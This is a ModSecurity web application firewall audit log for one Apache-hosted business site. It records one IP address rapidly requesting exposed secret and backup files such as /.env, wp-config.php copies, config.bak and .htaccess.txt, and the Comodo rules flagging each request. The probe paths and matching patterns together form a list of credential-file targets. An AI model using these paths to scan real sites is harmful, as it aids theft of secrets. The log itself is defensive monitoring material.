gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --efc2a57c-Z-- --289b4137-A-- [17/Jun/2025:00:34:38.642156 +0530] aFBqxh6Azi2u_ik2Q3KpCgAAAAY 185.177.72.201 55274 127.0.0.1 7080 --289b4137-B-- GET /backup/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --289b4137-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --289b4137-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/backup/.env"] [unique_id "aFBqxh6Azi2u_ik2Q3KpCgAAAAY"] Stopwatch: 1750100678639249 2959 (- - -) Stopwatch2: 1750100678639249 2959; combined=1659, p1=397, p2=1206, p3=0, p4=0, p5=56, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --289b4137-Z-- --f8bc8604-A-- [17/Jun/2025:00:34:39.084458 +0530] aFBqx33hoSwVUy254pH0LQAAACQ 185.177.72.201 55338 127.0.0.1 7080 --f8bc8604-B-- GET /.env.zip HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f8bc8604-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f8bc8604-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.zip"] [unique_id "aFBqx33hoSwVUy254pH0LQAAACQ"] Stopwatch: 1750100679081404 3119 (- - -) Stopwatch2: 1750100679081404 3119; combined=1745, p1=428, p2=1241, p3=0, p4=0, p5=75, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f8bc8604-Z-- --05003027-A-- [17/Jun/2025:00:34:39.194341 +0530] aFBqxyid3pHxA3RhGpzqJQAAAAk 185.177.72.201 55340 127.0.0.1 7080 --05003027-B-- GET /wp-config.php.disabled HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --05003027-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --05003027-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.disabled"] [unique_id "aFBqxyid3pHxA3RhGpzqJQAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.disabled' not found or unable to stat Stopwatch: 1750100679191679 2718 (- - -) Stopwatch2: 1750100679191679 2718; combined=1601, p1=343, p2=1200, p3=0, p4=0, p5=57, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05003027-Z-- --b17e265b-A-- [17/Jun/2025:00:34:40.189402 +0530] aFBqyE3CmevS3xeTzmojGwAAAAQ 185.177.72.201 35518 127.0.0.1 7080 --b17e265b-B-- GET /wp-config.php.4 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b17e265b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b17e265b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.4"] [unique_id "aFBqyE3CmevS3xeTzmojGwAAAAQ"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.4' not found or unable to stat Stopwatch: 1750100680186314 3143 (- - -) Stopwatch2: 1750100680186314 3143; combined=1786, p1=406, p2=1323, p3=0, p4=0, p5=57, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b17e265b-Z-- --f2631c60-A-- [17/Jun/2025:00:34:40.783513 +0530] aFBqyE3CmevS3xeTzmojHAAAAAQ 185.177.72.201 35574 127.0.0.1 7080 --f2631c60-B-- GET /config.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f2631c60-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f2631c60-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.bak"] [unique_id "aFBqyE3CmevS3xeTzmojHAAAAAQ"] Stopwatch: 1750100680780609 2958 (- - -) Stopwatch2: 1750100680780609 2958; combined=1668, p1=343, p2=1265, p3=0, p4=0, p5=59, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f2631c60-Z-- --34100d66-A-- [17/Jun/2025:00:34:41.004820 +0530] aFBqyRwcFb_n1P0IC9xlPgAAAAo 185.177.72.201 35582 127.0.0.1 7080 --34100d66-B-- GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --34100d66-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --34100d66-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/htaccess_for_page_not_found_redirects.htaccess"] [unique_id "aFBqyRwcFb_n1P0IC9xlPgAAAAo"] Stopwatch: 1750100681001698 3176 (- - -) Stopwatch2: 1750100681001698 3176; combined=1800, p1=416, p2=1326, p3=0, p4=0, p5=57, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --34100d66-Z-- --db78e76d-A-- [17/Jun/2025:00:34:41.556097 +0530] aFBqyU3CmevS3xeTzmojHQAAAAQ 185.177.72.201 35630 127.0.0.1 7080 --db78e76d-B-- GET /app/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --db78e76d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --db78e76d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/app/.env"] [unique_id "aFBqyU3CmevS3xeTzmojHQAAAAQ"] Stopwatch: 1750100681554139 2018 (- - -) Stopwatch2: 1750100681554139 2018; combined=1208, p1=274, p2=892, p3=0, p4=0, p5=42, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --db78e76d-Z-- --7613984b-A-- [17/Jun/2025:00:34:41.777117 +0530] aFBqyZlL5_2Zd8wUdfLJAAAAAAg 185.177.72.201 35662 127.0.0.1 7080 --7613984b-B-- GET /config.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7613984b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --7613984b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.old"] [unique_id "aFBqyZlL5_2Zd8wUdfLJAAAAAAg"] Stopwatch: 1750100681773729 3441 (- - -) Stopwatch2: 1750100681773729 3441; combined=2056, p1=385, p2=1615, p3=0, p4=0, p5=56, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7613984b-Z-- --6a118004-A-- [17/Jun/2025:00:34:41.999358 +0530] aFBqyY3q6eGJ2xNcTd6GygAAAAU 185.177.72.201 35688 127.0.0.1 7080 --6a118004-B-- GET /config.inc.php.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6a118004-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6a118004-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.inc.php.backup"] [unique_id "aFBqyY3q6eGJ2xNcTd6GygAAAAU"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/config.inc.php.backup' not found or unable to stat Stopwatch: 1750100681995289 4150 (- - -) Stopwatch2: 1750100681995289 4150; combined=2445, p1=490, p2=1865, p3=0, p4=0, p5=89, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6a118004-Z-- --69381d77-A-- [17/Jun/2025:00:34:43.260122 +0530] aFBqyyid3pHxA3RhGpzqKgAAAAk 185.177.72.201 35832 127.0.0.1 7080 --69381d77-B-- GET /server/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --69381d77-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --69381d77-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/server/.env"] [unique_id "aFBqyyid3pHxA3RhGpzqKgAAAAk"] Stopwatch: 1750100683257117 3059 (- - -) Stopwatch2: 1750100683257117 3059; combined=1726, p1=415, p2=1255, p3=0, p4=0, p5=56, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --69381d77-Z-- --031f076e-A-- [17/Jun/2025:00:34:43.702784 +0530] aFBqy03CmevS3xeTzmojIAAAAAQ 185.177.72.201 35880 127.0.0.1 7080 --031f076e-B-- GET /.env.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --031f076e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --031f076e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.bak"] [unique_id "aFBqy03CmevS3xeTzmojIAAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/.env.bak"] [unique_id "aFBqy03CmevS3xeTzmojIAAAAAQ"] Stopwatch: 1750100683699778 3061 (- - -) Stopwatch2: 1750100683699778 3061; combined=1735, p1=387, p2=1265, p3=0, p4=0, p5=83, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --031f076e-Z-- --720c306e-A-- [17/Jun/2025:00:34:44.416479 +0530] aFBqzBwcFb_n1P0IC9xlQwAAAAo 185.177.72.201 35966 127.0.0.1 7080 --720c306e-B-- GET /.htaccess.txt HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --720c306e-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --720c306e-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess.txt"] [unique_id "aFBqzBwcFb_n1P0IC9xlQwAAAAo"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess.txt Stopwatch: 1750100684415563 969 (- - -) Stopwatch2: 1750100684415563 969; combined=488, p1=395, p2=0, p3=0, p4=0, p5=93, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --720c306e-Z-- --9939fa25-A-- [17/Jun/2025:00:34:44.748157 +0530] aFBqzH3hoSwVUy254pH0NAAAACQ 185.177.72.201 36004 127.0.0.1 7080 --9939fa25-B-- GET /config.php.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9939fa25-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --9939fa25-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.php.backup"] [unique_id "aFBqzH3hoSwVUy254pH0NAAAACQ"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/config.php.backup' not found or unable to stat Stopwatch: 1750100684745103 3109 (- - -) Stopwatch2: 1750100684745103 3109; combined=1761, p1=379, p2=1316, p3=0, p4=0, p5=66, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9939fa25-Z-- --50922014-A-- [17/Jun/2025:00:34:45.190308 +0530] aFBqzSid3pHxA3RhGpzqLQAAAAk 185.177.72.201 36052 127.0.0.1 7080 --50922014-B-- GET /install.php.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --50922014-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --50922014-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/install.php.bak"] [unique_id "aFBqzSid3pHxA3RhGpzqLQAAAAk"] Stopwatch: 1750100685186720 3642 (- - -) Stopwatch2: 1750100685186720 3642; combined=2176, p1=370, p2=1747, p3=0, p4=0, p5=59, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --50922014-Z-- --6c37f272-A-- [17/Jun/2025:00:34:45.522957 +0530] aFBqzR6Azi2u_ik2Q3KpFAAAAAY 185.177.72.201 36076 127.0.0.1 7080 --6c37f272-B-- GET /.env.tmp HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6c37f272-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6c37f272-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.tmp"] [unique_id "aFBqzR6Azi2u_ik2Q3KpFAAAAAY"] Stopwatch: 1750100685519668 3344 (- - -) Stopwatch2: 1750100685519668 3344; combined=1854, p1=395, p2=1391, p3=0, p4=0, p5=68, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: 